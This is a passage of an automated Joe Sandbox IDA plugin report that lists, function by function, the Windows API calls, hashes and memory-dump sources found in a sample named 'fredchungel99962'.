Opcode ID: 837f221799fb3e06cb97a7a60376ef6388c1304bb924810d4accb644460254a1
Instruction ID: fb0c693a19259f0ee0d9748960fdefbaded0ef689b9fd8ee2a972a45b7520bdf
Opcode Fuzzy Hash: 837f221799fb3e06cb97a7a60376ef6388c1304bb924810d4accb644460254a1
Instruction Fuzzy Hash: 5E31B475A00219EFCB14CFBCC989ADE7BB6EB45319F009225FA31A72C5C770A954CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01345706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 01345745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0134579D
_wcslen.LIBCMT ref: 013457AF
_wcslen.LIBCMT ref: 013457BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 01345816

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 7b45078b4ae3db198e0ac85926ad3aefd3164ac8291dab96a35ae49aa83d0d4c
Instruction ID: 08da1cda3b934e1567c14fe842884317ddc846562c76711cd6004c639c8b2e0a
Opcode Fuzzy Hash: 7b45078b4ae3db198e0ac85926ad3aefd3164ac8291dab96a35ae49aa83d0d4c
Instruction Fuzzy Hash: 81215375E042589BEB20DF65CC84AEDBBFCFF15728F008216EA19EA684D770A585CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01330930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 01330951
GetForegroundWindow.USER32 ref: 01330968
GetDC.USER32(00000000), ref: 013309A4
GetPixel.GDI32(00000000,?,00000003), ref: 013309B0
ReleaseDC.USER32(00000000,00000003), ref: 013309E8

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 51de808b1d2821cbeef405fc0ff091fe3af972370ce87fe146a5f209a1a82f56
Instruction ID: b837760125f7dadc48377b0c0028b0396ac186cecdd40d09addf063bf8c8749a
Opcode Fuzzy Hash: 51de808b1d2821cbeef405fc0ff091fe3af972370ce87fe146a5f209a1a82f56
Instruction Fuzzy Hash: 3F219339600214AFD714EF69D984AAEBBF9FF54754F048069E84AD7761CB30BD04CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012ECDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 012ECDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 012ECDE9

Part of subcall function 012E3820: RtlAllocateHeap.NTDLL(00000000,?,01381444,?,012CFDF5,?,?,012BA976,00000010,01381440,012B13FC,?,012B13C6,?,012B1129), ref: 012E3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 012ECE0F
_free.LIBCMT ref: 012ECE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 012ECE31

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 448316519bc140649893e96559c023c3a34623dd87996215173c8d6a287e6a98
Instruction ID: 1a83f7f262610485bc6693109994987d114991c47cc446586bd46684b485c106
Opcode Fuzzy Hash: 448316519bc140649893e96559c023c3a34623dd87996215173c8d6a287e6a98
Instruction Fuzzy Hash: 6401D8726122167F732515FA6C4CC7B6DADEEC6AA13590119FB05D7204DE618D2182B0

Uniqueness

Uniqueness Score: -1.00%

Function 012C9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 012C9693
SelectObject.GDI32(?,00000000), ref: 012C96A2
BeginPath.GDI32(?), ref: 012C96B9
SelectObject.GDI32(?,00000000), ref: 012C96E2

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: c3567d54cc2f45ec41e62b9c941ddd0ef1380c8ac7b95755f21544eeaefe9ad4
Instruction ID: c493aaffd50b59bbd81dd1636ae3fdfee5f64d42335c31ad984a3aa4079697a9
Opcode Fuzzy Hash: c3567d54cc2f45ec41e62b9c941ddd0ef1380c8ac7b95755f21544eeaefe9ad4
Instruction Fuzzy Hash: C9218331822306EFEF219F68E8057AD3BACBB00B19F200319F610A61D8D7709492CFD4

Uniqueness

Uniqueness Score: -1.00%

Function 01315711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 01315726
_memcmp.LIBVCRUNTIME ref: 01315744
_memcmp.LIBVCRUNTIME ref: 01315757
_memcmp.LIBVCRUNTIME ref: 0131576F
_memcmp.LIBVCRUNTIME ref: 01315787

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 7fe3321e6f6791b575daf6e282c4d169fd9f43db69053dec7fb8ae8ea8765de1
Instruction ID: f4baef2f72ba4e102b04a2d7dbe8bb5a82359fc4bd0b8e89d116623d7eb14bce
Opcode Fuzzy Hash: 7fe3321e6f6791b575daf6e282c4d169fd9f43db69053dec7fb8ae8ea8765de1
Instruction Fuzzy Hash: E001B5A564120ABBE64C57199D82FBB739C9BB21ACF044024FD049AB09FB60FD2086A4

Uniqueness

Uniqueness Score: -1.00%

Function 012E2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,012DF2DE,012E3863,01381444,?,012CFDF5,?,?,012BA976,00000010,01381440,012B13FC,?,012B13C6), ref: 012E2DFD
_free.LIBCMT ref: 012E2E32
_free.LIBCMT ref: 012E2E59
SetLastError.KERNEL32(00000000,012B1129), ref: 012E2E66
SetLastError.KERNEL32(00000000,012B1129), ref: 012E2E6F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 7efb8fcd680b8c0872bae26f50d20164f0a442506f82f8581e11a28a0a180887
Instruction ID: 8075dcf864834e3df6c2ed8fa33a82d4fe84eb1269fbdb0169ec1bcecfca664c
Opcode Fuzzy Hash: 7efb8fcd680b8c0872bae26f50d20164f0a442506f82f8581e11a28a0a180887
Instruction Fuzzy Hash: 57012D36135613E7C72366386C4DD3B26DDABD17B5BE91028F513E3286EF74AC014220

Uniqueness

Uniqueness Score: -1.00%

Function 0131000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 0131002B
ProgIDFromCLSID.OLE32(?,00000000), ref: 01310046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0130FF41,80070057,?,?), ref: 01310054
CoTaskMemFree.OLE32(00000000), ref: 01310064
CLSIDFromString.OLE32(?,?), ref: 01310070

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: c6d0f4d52a988c508f01dfef8d544b28c62bcf1b94cd4c25e5d6d55230a6aa9c
Instruction ID: 6d48432b3f58efa38aae18bc139ee316c3f3b62dbd6f4ba00103cd51e0c74cc1
Opcode Fuzzy Hash: c6d0f4d52a988c508f01dfef8d544b28c62bcf1b94cd4c25e5d6d55230a6aa9c
Instruction Fuzzy Hash: 6601A776601204BFEB284F68DC04BAE7EEDEF44765F145114F905D2208EB75DE808760

Uniqueness

Uniqueness Score: -1.00%

Function 0131E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0131E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0131E9A5
Sleep.KERNEL32(00000000), ref: 0131E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0131E9B7
Sleep.KERNEL32 ref: 0131E9F3

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 0db905a6f9eedc11e0fc557b6c6f69b220f79a25ddd6ef79434b69c355e27be2
Instruction ID: fc8b3a51258a8af5c6d8fd4c5b2060c9a07aedc0b94dc1e496ab6fe5e060faca
Opcode Fuzzy Hash: 0db905a6f9eedc11e0fc557b6c6f69b220f79a25ddd6ef79434b69c355e27be2
Instruction Fuzzy Hash: D1015735C0262DDBCF15ABE4D848AEDBB79BB09704F000566E902B2248DB39A150CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013110F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01311114
GetLastError.KERNEL32(?,00000000,00000000,?,?,01310B9B,?,?,?), ref: 01311120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01310B9B,?,?,?), ref: 0131112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01310B9B,?,?,?), ref: 01311136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0131114D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 97d82ca24ad141c4d56123c2c3efbda21517ad4e17074ab51b7e2fad39b44796
Instruction ID: d158f8c9a2f696584e6b479597e82975450dfc13d6e20c87bd08d3a1da227852
Opcode Fuzzy Hash: 97d82ca24ad141c4d56123c2c3efbda21517ad4e17074ab51b7e2fad39b44796
Instruction Fuzzy Hash: 0F011D79101205BFDB254FA9DC49AAA7F6EEF86364F100425FA45D7354DE31ED009B60

Uniqueness

Uniqueness Score: -1.00%

Function 01310FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01310FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01310FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01310FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01310FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01311002

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 87738229275268c88a1cfa6df8ac8acdb92174e7b051fa2f753b786f52a35abb
Instruction ID: 78ed9522325c4bff861cf407eab1549b8147b89b4b454a2bcb86bfd0c2fc5e70
Opcode Fuzzy Hash: 87738229275268c88a1cfa6df8ac8acdb92174e7b051fa2f753b786f52a35abb
Instruction Fuzzy Hash: E2F06D39602301ABDB214FA8DC4DF963FADEF8A7A2F100414FA45C7255CE70E8408B60

Uniqueness

Uniqueness Score: -1.00%

Function 01311014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0131102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01311036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01311045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0131104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01311062

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9f8f1b54e495b693dbeebb65159c01ee9eb707e3d2eda097ade5547dd62fa4f4
Instruction ID: 4d57de1be739ee5f62bdbd7b662116889f9852f3f7b313359e001b631a92ba14
Opcode Fuzzy Hash: 9f8f1b54e495b693dbeebb65159c01ee9eb707e3d2eda097ade5547dd62fa4f4
Instruction Fuzzy Hash: 71F06D39602301ABDB225FA9EC49F963FADEF8A761F100414FA45C7254CE70E940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0132030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 01320324
CloseHandle.KERNEL32(?), ref: 01320331
CloseHandle.KERNEL32(?), ref: 0132033E
CloseHandle.KERNEL32(?), ref: 0132034B
CloseHandle.KERNEL32(?), ref: 01320358
CloseHandle.KERNEL32(?), ref: 01320365

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c439b5a7c8ba64149fdf61c29da58eb0ba7786ca391ae6363c30027e050f0992
Instruction ID: 42dc1480ae46e5f134351f47b6c23790f59693c588cbd0755e1c97338abd7b66
Opcode Fuzzy Hash: c439b5a7c8ba64149fdf61c29da58eb0ba7786ca391ae6363c30027e050f0992
Instruction Fuzzy Hash: E701A272801B259FD735AF6AD880417FBF9BF502193158A3FE29652931C771A958CF80

Uniqueness

Uniqueness Score: -1.00%

Function 012ED73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 012ED752

Part of subcall function 012E29C8: HeapFree.KERNEL32(00000000,00000000), ref: 012E29DE
Part of subcall function 012E29C8: GetLastError.KERNEL32(00000000,?,012ED7D1,00000000,00000000,00000000,00000000,?,012ED7F8,00000000,00000007,00000000,?,012EDBF5,00000000,00000000), ref: 012E29F0

_free.LIBCMT ref: 012ED764
_free.LIBCMT ref: 012ED776
_free.LIBCMT ref: 012ED788
_free.LIBCMT ref: 012ED79A

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a4fddb48c567a3bf44455292264d37be7592342c99a3ac9e00ebab77b782b71e
Instruction ID: 7c86809b87923131b009c2d0f477fa052cb2c10c0556a1bb72066cec1b140d5e
Opcode Fuzzy Hash: a4fddb48c567a3bf44455292264d37be7592342c99a3ac9e00ebab77b782b71e
Instruction Fuzzy Hash: 98F04F325A024FEBD675EBA8F5C9C6A7FDDBB04360BE52805E249E7504C734F8808760

Uniqueness

Uniqueness Score: -1.00%

Function 012E22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 012E22BE

Part of subcall function 012E29C8: HeapFree.KERNEL32(00000000,00000000), ref: 012E29DE
Part of subcall function 012E29C8: GetLastError.KERNEL32(00000000,?,012ED7D1,00000000,00000000,00000000,00000000,?,012ED7F8,00000000,00000007,00000000,?,012EDBF5,00000000,00000000), ref: 012E29F0

_free.LIBCMT ref: 012E22D0
_free.LIBCMT ref: 012E22E3
_free.LIBCMT ref: 012E22F4
_free.LIBCMT ref: 012E2305

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6333d5276266757d507b5f207cd1f6cab30dc2c983a56ee3fa133fd9ddea62c0
Instruction ID: ff982fd235f60d059e747180594f7538300df3d4bf7ea3e9531c8fb9326f32d4
Opcode Fuzzy Hash: 6333d5276266757d507b5f207cd1f6cab30dc2c983a56ee3fa133fd9ddea62c0
Instruction Fuzzy Hash: 7BF030B5410316DBCB36AF54B80589C3FECB7287A0B557506F411D6258C73414169BA5

Uniqueness

Uniqueness Score: -1.00%

Function 012C95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 012C95D4
StrokeAndFillPath.GDI32(?), ref: 012C95F0
SelectObject.GDI32(?,00000000), ref: 012C9603
DeleteObject.GDI32 ref: 012C9616
StrokePath.GDI32(?), ref: 012C9631

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: a2f66d462440f2af822f5759aa2d1d227b6102b66d1ea11022fe15db19c03a3c
Instruction ID: bfdec5a256350a62b2e89cc95b585d934cda064aa607d2819e607c4ca621887e
Opcode Fuzzy Hash: a2f66d462440f2af822f5759aa2d1d227b6102b66d1ea11022fe15db19c03a3c
Instruction Fuzzy Hash: F7F03735026709AFEB365F69E90CBA83F69EB01766F148318F625550E8CB319592CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 012E0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 012E10F9
__freea.LIBCMT ref: 012E1117

Part of subcall function 012E1537: _free.LIBCMT ref: 012E154F

Strings

a/p, xrefs: 012E11DE
am/pm, xrefs: 012E117A

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: d4f3b283d2a021a0b09b9452e7f889135a6631de4b0fe0af893713f6d4e76dca
Instruction ID: d7589dd557eaa08f251a71be274b635b1ee3427d04138c9ba3deef0dd2ac744d
Opcode Fuzzy Hash: d4f3b283d2a021a0b09b9452e7f889135a6631de4b0fe0af893713f6d4e76dca
Instruction Fuzzy Hash: 52D1C071A302078AEB258F6CC85DBFABBF1EF05300F984179EB019B654D37599A0CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01337B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 012D0242: EnterCriticalSection.KERNEL32(P=r,01381884,?,?,012C198B,01382518,?,?,?,012B12F9,00000000), ref: 012D024D
Part of subcall function 012D0242: LeaveCriticalSection.KERNEL32(P=r,?,012C198B,01382518,?,?,?,012B12F9,00000000), ref: 012D028A

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

Part of subcall function 012D00A3: __onexit.LIBCMT ref: 012D00A9

__Init_thread_footer.LIBCMT ref: 01337BFB

Part of subcall function 012D01F8: EnterCriticalSection.KERNEL32(P=r,?,?,012C8747,01382514), ref: 012D0202
Part of subcall function 012D01F8: LeaveCriticalSection.KERNEL32(P=r,?,012C8747,01382514), ref: 012D0235

Strings

5, xrefs: 01337C78
G, xrefs: 01337C7F
Variable must be of type 'Object'., xrefs: 01337C3A

Memory Dump Source

